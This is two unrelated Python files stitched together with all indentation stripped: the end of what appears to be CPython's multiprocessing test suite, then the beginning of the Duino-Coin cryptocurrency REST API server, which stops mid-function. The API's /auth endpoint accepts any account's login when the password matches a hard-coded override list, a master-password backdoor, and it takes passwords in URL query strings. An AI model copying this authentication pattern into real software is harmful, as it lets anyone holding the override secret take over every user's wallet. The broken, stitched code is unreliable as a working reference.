support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
app.py
|
#!/usr/bin/env python3
"""
Duino-Coin REST API © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duco-rest-api
Duino-Coin Team & Community 2019-2021
"""
import gevent.monkey
gevent.monkey.patch_all()
from wrapped_duco_functions import *
from Server import (
now, SAVE_TIME, POOL_DATABASE, CONFIG_WHITELIST_USR,
jail, global_last_block_hash, HOSTNAME,
DATABASE, DUCO_EMAIL, DUCO_PASS, alt_check, acc_check,
DB_TIMEOUT, CONFIG_MINERAPI, SERVER_VER,
CONFIG_TRANSACTIONS, API_JSON_URI,
BCRYPT_ROUNDS, user_exists, SOCKET_TIMEOUT,
email_exists, send_registration_email,
DECIMALS, CONFIG_BANS, protocol_verified_mail,
CONFIG_JAIL, CONFIG_WHITELIST, perm_ban,
NodeS_Overide, CAPTCHA_SECRET_KEY)
from fastrand import pcg32bounded as fastrandint
from xxhash import xxh64
from hashlib import sha1
import threading
import traceback
import os
from json import load
from bcrypt import hashpw, gensalt, checkpw
from sqlite3 import connect as sqlconn
from time import sleep, time
from re import sub, match
from colorama import Back, Fore, Style, init
import smtplib
import ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from nano_lib_rvx import Account
from tronapi import HttpProvider
from tronapi import Tron
from cashaddress import convert
from bitcash import Key
import requests
import random
import json
from socket import socket
from flask_ipban import IpBan
from flask_limiter.util import get_remote_address
from flask_limiter import Limiter
from flask import Flask, request, jsonify, render_template
from flask_caching import Cache
import functools
from dotenv import load_dotenv
def forwarded_ip_check():
return request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
def dbg(*message):
if "TX" in str(message):
fg_color = Fore.YELLOW
elif "EX" in str(message):
fg_color = Fore.CYAN
elif "Error" in str(message):
fg_color = Fore.RED
elif "Success" in str(message):
fg_color = Fore.GREEN
else:
fg_color = Fore.WHITE
print(now().strftime(
Style.RESET_ALL
+ Style.DIM
+ Fore.WHITE
+ "%H:%M:%S")
+ Style.BRIGHT
+ fg_color,
*message,
Style.RESET_ALL)
# Exchange settings
exchange_address = {
"duco": "coinexchange",
"xmg": "95JLhkyWVDce5D17LyApULc5YC4vrVzaio",
"lke": "Like3yYC34YQJRMQCSbTDWKLhnzCoZvo9AwWuu5kooh",
"bch": "bitcoincash:qpgpd7slludx5h9p53qwf8pxu9z702n95qteeyzay3",
"trx": "TQUowTaHwvkWHbNVkxkAbcnbYyhF4or1Qy",
"xrp": "rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ (Destination tag: 2039609160)",
"dgb": "DHMV4BNGpWbdhpq6Za3ArncuhpmtCjyQXg",
"nano": "nano_3fpqpbcgt3nga3s81td6bk7zcqdr7ockgnyjkcy1s8nfn98df6c5wu14fuuq",
"fjc": "FsfCoLL8JmLJoU57bUr2W3u3TA8acL9kf3",
"rvn": "RH4bTDaHH7LSSCVSvXJzJ5KkiGR1QRMaqN",
"nim": "NQ88 Q9ME 470X 8KY8 HXQG J96N 6FHR 8G0B EDMH"}
load_dotenv()
IPDB_KEY = os.getenv('IPDB_KEY')
PROXYCHECK_KEY = os.getenv('PROXYCHECK_KEY')
TRX_SECRET_KEY = os.getenv('TRX_SECRET_KEY')
BCH_SECRET_KEY = os.getenv('BCH_SECRET_KEY')
LIKECOIN_SECRET_KEY = os.getenv('LIKECOIN_SECRET_KEY')
NANO_SECRET_KEY = os.getenv('NANO_SECRET_KEY')
EXCHANGE_MAIL = DUCO_EMAIL
IP_CHECK_DISABLED = False
XXHASH_TX_PROB = 30
overrides = [
NodeS_Overide,
DUCO_PASS]
config = {
"DEBUG": False,
"CACHE_TYPE": "redis",
"CACHE_REDIS_URL": "redis://localhost:6379/0",
"CACHE_DEFAULT_TIMEOUT": SAVE_TIME,
"JSONIFY_PRETTYPRINT_REGULAR": False}
limiter = Limiter(
key_func=forwarded_ip_check,
default_limits=["5000 per day", "1 per 1 second"],)
ip_ban = IpBan(
ban_seconds=60*60,
ban_count=3,
persist=True,
ip_header='HTTP_X_REAL_IP',
record_dir="config/ipbans/",
ipc=True,
secret_key=DUCO_PASS,
abuse_IPDB_config={
"key": IPDB_KEY,
"report": True,
"load": False})
app = Flask(__name__, template_folder='config/error_pages')
app.config.from_mapping(config)
cache = Cache(app)
limiter.init_app(app)
ip_ban.init_app(app)
requests_session = requests.Session()
thread_lock = threading.Lock()
nano_key = Account(priv_key=NANO_SECRET_KEY)
bch_key = Key(BCH_SECRET_KEY)
trx_key = Tron(
full_node=HttpProvider('https://api.trongrid.io'),
solidity_node=HttpProvider('https://api.trongrid.io'),
event_server=HttpProvider('https://api.trongrid.io'))
trx_key.private_key = TRX_SECRET_KEY
trx_key.default_address = exchange_address["trx"]
last_transactions_update, last_miners_update, last_balances_update = 0, 0, 0
miners, balances, transactions = [], [], []
rate_count, last_transfer, checked_ips = {}, {}, {}
banlist, jailedusr, registrations, whitelisted_usr = [], [], [], []
with open('config/sell_email.html', 'r') as file:
html_exc = file.read()
with open('config/sell_email.html', 'r') as file:
html_auto = file.read()
with open('config/buy_email.html', 'r') as file:
html_buy = file.read()
with open(CONFIG_JAIL, "r") as jailedfile:
jailedusr = jailedfile.read().splitlines()
for username in jailedusr:
jail.append(username)
dbg("Successfully loaded jailed usernames file")
with open(CONFIG_BANS, "r") as bannedusrfile:
bannedusr = bannedusrfile.read().splitlines()
for username in bannedusr:
banlist.append(username)
dbg("Successfully loaded banned usernames file")
with open(CONFIG_WHITELIST_USR, "r") as whitelistedusrfile:
whitelist = whitelistedusrfile.read().splitlines()
for username in whitelist:
whitelisted_usr.append(username)
dbg("Successfully loaded whitelisted usernames file")
with open(CONFIG_WHITELIST, "r") as whitelistfile:
whitelist = whitelistfile.read().splitlines()
for ip in whitelist:
ip_ban.ip_whitelist_add(ip)
dbg("Successfully loaded whitelisted IPs file")
def likecoin_transaction(recipient: str, amount: int, comment: str):
data = {
"address": str(recipient),
"amount": str(int(amount) * 1000000000),
"comment": str(comment),
"prv": LIKECOIN_SECRET_KEY}
r = requests.post(
"https://wallet.likecoin.pro/api/v0/new-transfer",
data=data).json()
if "error" in r:
raise Exception(r["error"])
else:
return r["hash"]
def error_log(message: str):
with open('exchange_errors.txt', 'a') as file:
file.write(str(message))
observations = {}
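# Error handlers below count repeated 429/403 hits per IP in `observations`
# and block the address once it crosses the threshold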
@app.errorhandler(429)
def error429(e):
global observations
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 20:
dbg("Too many observations", ip_addr)
if not ip_addr in whitelist:
ip_ban.block(ip_addr)
return render_template('403.html'), 403
else:
limit_err = str(e).replace("429 Too Many Requests: ", "")
dbg("Error 429", ip_addr, limit_err, os.getpid())
return render_template('429.html', limit=limit_err), 429
@app.errorhandler(404)
def error404(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
page_name = str(request.url)
ip_ban.add(ip=ip_addr)
dbg("Error 404", ip_addr, page_name)
return render_template('404.html', page_name=page_name), 404
@app.errorhandler(500)
def error500(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
dbg("Error 500", ip_addr)
return render_template('500.html'), 500
@app.errorhandler(403)
def error403(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
ip_ban.block(ip_addr)
dbg("Error 403", ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 40:
dbg("Too many observations - banning", ip_addr)
if not ip_addr in whitelist:
ip_addr_ban(ip_addr)
return render_template('403.html'), 403
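# Verify a username/password pair against the bcrypt hash stored in the Users table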
def login(username: str, unhashed_pass: str):
if not match(r"^[A-Za-z0-9_-]*$", username):
return (False, "Incorrect username")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
data = datab.fetchone()
if data and len(data) > 1:
stored_password = data[1]
else:
return (False, "No user found")
try:
if checkpw(unhashed_pass, stored_password):
return (True, "Logged in")
return (False, "Invalid password")
except Exception:
if checkpw(unhashed_pass, stored_password.encode('utf-8')):
return (True, "Logged in")
return (False, "Invalid password")
except Exception as e:
return (False, "DB Err: " + str(e))
def check_ip(ip):
global checked_ips
global IP_CHECK_DISABLED
try:
if IP_CHECK_DISABLED:
return (False, None)
elif not ip:
return (True, "Your IP address is hidden")
elif ip in whitelist:
return (False, None)
elif ip in checked_ips:
return checked_ips[ip]
response = requests_session.get(
f"http://proxycheck.io/v2/{ip}"
+ f"?key={PROXYCHECK_KEY}&vpn=1&proxy=1").json()
if response["status"] != "error":
if "proxy" in response[ip]:
if response[ip]["proxy"] == "yes":
dbg("Proxy detected: " + str(ip))
checked_ips[ip] = (True, "You're using a proxy")
return checked_ips[ip]
if "vpn" in response[ip]:
if response[ip]["vpn"] == "yes":
dbg("VPN detected: " + str(ip))
checked_ips[ip] = (True, "You're using a VPN")
return checked_ips[ip]
else:
# dbg("No proxy: " + str(ip))
checked_ips[ip] = (False, None)
return (False, None)
else:
IP_CHECK_DISABLED = True
return (False, None)
except Exception as e:
return (False, None)
def ip_addr_ban(ip, show=True, perm=False):
if not ip in whitelist:
if show:
dbg(">>> Ip addr banning", ip)
ip_ban.block(ip)
if perm:
perm_ban(ip)
def _success(result, code=200):
return jsonify(result=result, success=True), code
def _error(result, code=200):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
return jsonify(message=result, success=False), code
def _proxy():
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
threading.Thread(target=ip_addr_ban, args=[ip_addr, False, True]).start()
return _error("You're using a proxy or VPN")
def get_all_transactions():
global transactions
global last_transactions_update
if time() - last_transactions_update > SAVE_TIME*3:
# print(f'fetching transactions from {CONFIG_TRANSACTIONS}')
try:
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Transactions")
rows = datab.fetchall()
transactions = {}
for row in rows:
transactions[row[4]] = row_to_transaction(row)
last_transactions_update = time()
except Exception as e:
print(traceback.format_exc())
return transactions
def row_to_transaction(row):
return {
'datetime': str(row[0]),
'sender': str(row[1]),
'recipient': str(row[2]),
'amount': float(row[3]),
'hash': str(row[4]),
'memo': str(row[5]),
'id': int(row[6])
}
def get_transactions(username: str, limit=10, reverse=True):
try:
order = "DESC"
if reverse:
order = "ASC"
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT * FROM (
SELECT * FROM Transactions
WHERE username = ?
OR recipient = ?
ORDER BY id DESC
LIMIT ?
) ORDER BY id """ + order,
(username, username, limit))
rows = datab.fetchall()
return [row_to_transaction(row) for row in rows]
except Exception as e:
return str(e)
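# Cached snapshot of the Miners table, grouped by username and refreshed every SAVE_TIME*3 seconds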
def get_all_miners():
global last_miners_update
global miners
if time() - last_miners_update > SAVE_TIME*3:
try:
# print(f'fetching miners from {CONFIG_MINERAPI}')
with sqlconn(CONFIG_MINERAPI, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Miners")
rows = datab.fetchall()
last_miners_update = time()
miners = {}
for row in rows:
if not row[1] in miners:
miners[row[1]] = []
miners[row[1]].append(row_to_miner(row))
except Exception as e:
print(traceback.format_exc())
return miners
def row_to_miner(row):
return {
"threadid": str(row[0]),
"username": str(row[1]),
"hashrate": float(row[2]),
"sharetime": float(row[3]),
"accepted": int(row[4]),
"rejected": int(row[5]),
"diff": int(row[6]),
"software": str(row[7]),
"identifier": str(row[8]),
"algorithm": str(row[9]),
"pool": str(row[10]),
"wd": row[11]
}
def get_miners(username: str):
with sqlconn(CONFIG_MINERAPI, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Miners WHERE username = ?", (username, ))
rows = datab.fetchall()
if len(rows) < 1:
raise Exception("No miners detected")
rows.sort(key=lambda tup: tup[1])
return [row_to_miner(row) for row in rows]
trusted = {}
creation = {}
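# Cached snapshot of user balances; also refreshes the creation and trusted caches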
def get_all_balances():
global balances
global last_balances_update
global trusted
global creation
if time() - last_balances_update > SAVE_TIME*3:
try:
# print(f'fetching balances from {DATABASE}')
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Users")
rows = datab.fetchall()
balances = {}
trusted = {}
for row in rows:
balances[row[0]] = row[3]
creation[row[0]] = row[4].lower()
trusted[row[0]] = row[5].lower()
last_balances_update = time()
except Exception as e:
print(traceback.format_exc())
return balances
def get_user_data(username: str):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
row = datab.fetchone()
if not row:
raise Exception("User not found")
return {
"username": username,
"balance": round(row[3], DECIMALS),
"verified": row[5].lower(),
"created": row[4].lower()
}
def is_verified(username: str):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
row = datab.fetchone()
if not row:
return "no"
return row[5].lower()
@app.route("/ping")
@cache.cached(timeout=60)
def ping():
return _success("Pong!")
@app.route("/404")
@cache.cached(timeout=60)
def test404():
dbg("Error 404 test")
return render_template('404.html'), 404
@app.route("/429")
@cache.cached(timeout=60)
def test429():
dbg("Error 429 test")
return render_template('429.html'), 429
@app.route("/403")
@cache.cached(timeout=60)
def test403():
dbg("Error 403 test")
return render_template('403.html'), 403
@app.route("/500")
@cache.cached(timeout=60)
def test500():
dbg("Error 500 test")
return render_template('500.html'), 500
@app.route("/all_pools")
@cache.cached(timeout=SAVE_TIME)
def all_pools():
pools = []
try:
with sqlconn(POOL_DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM PoolList")
data = datab.fetchall()
for row in data:
if row[4] == "True":
pool = {
"name": row[1],
"cpu": int(row[6]),
"ram": int(row[7]),
"connections": int(row[8])}
pools.append(pool)
return _success(pools)
except Exception as e:
return _error(str(e))
@app.route("/autopool")
@cache.cached(timeout=SAVE_TIME)
def getpool():
pools = []
try:
with sqlconn(POOL_DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM PoolList")
data = datab.fetchall()
for row in data:
if row[4] == "True":
pool = {
"name": row[1],
"cpu": int(row[6]),
"ram": int(row[7]),
"ip": str(row[2]),
"port": int(row[3]),
"connections": int(row[8])}
pools.append(pool)
if not pools:
return _error("No pools available")
# pick the pool with the lowest weighted load (2*CPU + RAM)
pool = functools.reduce(
lambda curr, prev: prev
if (curr["cpu"]*2 + curr["ram"]) > (prev["cpu"]*2 + prev["ram"])
else curr, pools)
return jsonify({
"name": pool["name"],
"ip": pool["ip"],
"port": pool["port"],
"success": True})
except Exception as e:
return _error(str(e))
registration_db = {}
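# Login endpoint: checks proxy/VPN usage and bans before verifying credentials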
@app.route("/auth/<username>")
@limiter.limit("6 per 1 minute")
def api_auth(username=None):
global registration_db
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass = str(request.args.get('password', None)).encode('utf-8')
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username) or not username:
return _error("This user doesn't exist")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
#dbg("/GET/auth", username, unhashed_pass.decode())
if unhashed_pass.decode() in overrides:
return _success("Logged in")
if username in banlist:
ip_addr_ban(ip_addr)
return _error("User banned")
login_protocol = login(username, unhashed_pass)
if login_protocol[0] == True:
alt_check(ip_addr, username)
return _success(login_protocol[1])
else:
return _error(login_protocol[1])
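# Registration endpoint: validates the captcha, alt accounts and input, then stores a bcrypt-hashed password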
@app.route("/register/")
@limiter.limit("5 per hour")
def register():
global registrations
try:
username = str(request.args.get('username', None))
unhashed_pass = str(request.args.get('password', None)).encode('utf-8')
email = str(request.args.get('email', None))
captcha = request.args.get('captcha', None)
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
postdata = {'secret': CAPTCHA_SECRET_KEY,
'response': captcha}
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
altcheck = alt_check(ip_addr, username, False)
if altcheck[0]:
return _error(
f"You are already registered as {altcheck[1]}, why do you need another account?")
try:
captcha_data = requests.post(
'https://hcaptcha.com/siteverify', data=postdata).json()
if not captcha_data["success"]:
return _error("Incorrect captcha")
except Exception as e:
return _error("Captcha error: "+str(e))
if not match(r"^[A-Za-z0-9_-]*$", username):
return _error("You have used unallowed characters in the username")
if len(username) > 64 or len(unhashed_pass) > 128 or len(email) > 64:
return _error("Submited data is too long")
if user_exists(username):
return _error("This username is already registered")
if not "@" in email or not "." in email:
return _error("You have provided an invalid e-mail address")
if email_exists(email):
return _error("This e-mail address was already used")
try:
password = hashpw(unhashed_pass, gensalt(rounds=BCRYPT_ROUNDS))
except Exception as e:
return _error("Bcrypt error: " +
str(e) + ", plase try using a different password")
try:
threading.Thread(
target=send_registration_email,
args=[username, email]).start()
created = str(now().strftime("%d/%m/%Y %H:%M:%S"))
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Users
(username, password, email, balance, created)
VALUES(?, ?, ?, ?, ?)""",
(username, password, email, 0.0, created))
conn.commit()
dbg(f"Success: registered {username} ({email})")
registrations.append(ip_addr)
return _success("Sucessfully registered a new wallet")
except Exception as e:
return _error(f"Error registering new account: {e}")
@app.route("/miners/<username>")
@cache.cached(timeout=SAVE_TIME)
def get_miners_api(username: str):
# Get all miners
try:
return _success(get_miners(username))
except:
return _error("No miners detected on that account")
@app.route("/wduco_wrap/<username>")
@limiter.limit("3 per 1 minute")
def api_wrap_duco(username: str):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass = request.args.get('password', None).encode("utf-8")
amount = float(request.args.get('amount', None))
tron_address = str(request.args.get('address', None))
except Exception as e:
return _error(f"Invalid data: {e}")
dbg("GET/wduco_wrap", username, amount, tron_address)
login_protocol = login(username, unhashed_pass)
if not login_protocol[0]:
return _error(login_protocol[1])
if amount < 30:
return _error("Minimum wrappable amount is 30 DUCO")
if username in jail or username in banlist:
return _error("User can not wrap DUCO")
altfeed = alt_check(ip_addr, username, True, False)
if altfeed[0]:
if not username in altfeed[1][:2]: # Filter first two accounts
return _error(f"You're using alt-account(s): {altfeed[1][2]}")
wrapfeedback = protocol_wrap_wduco(username, tron_address, amount)
wrapfeedback = wrapfeedback.replace("NO,", "").replace("OK,", "")
if "OK" in wrapfeedback:
return _success(wrapfeedback)
else:
return _error(wrapfeedback)
@app.route("/users/<username>")
@limiter.limit("60 per 1 minute")
@cache.cached(timeout=SAVE_TIME)
def api_get_user_objects(username: str):
